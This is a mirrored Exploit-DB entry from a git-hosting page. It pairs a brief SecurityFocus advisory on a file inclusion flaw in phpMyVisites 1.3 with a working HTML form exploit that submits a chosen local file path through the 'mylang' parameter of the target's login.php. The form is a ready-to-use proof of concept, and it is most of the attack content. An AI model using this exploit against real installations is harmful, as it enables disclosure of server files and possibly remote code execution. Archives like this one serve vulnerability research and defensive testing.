bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/25531.html
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

12 lines
No EOL
664 B
HTML
Raw Blame History

source: https://www.securityfocus.com/bid/13370/info
phpMyVisites allows attackers to include arbitrary files. While it has been demonstrated that local files may be included through this vulnerability, there is an unconfirmed possibility of remote file inclusion.
Exploitation could disclose local files, or in the case of remote file inclusion, let the attacker execute malicious PHP code.
The issue is known to affect phpMyVisites 1.3. Other versions may also be affected.
<form action="http://[pathtoyourphpMyVisites]/login.php" method="POST">
Local file: <input type="text" name="mylang" value="" />
<input type="submit" value="Alexx says RELAX!">
</form>
Reference in a new issue View git blame Copy permalink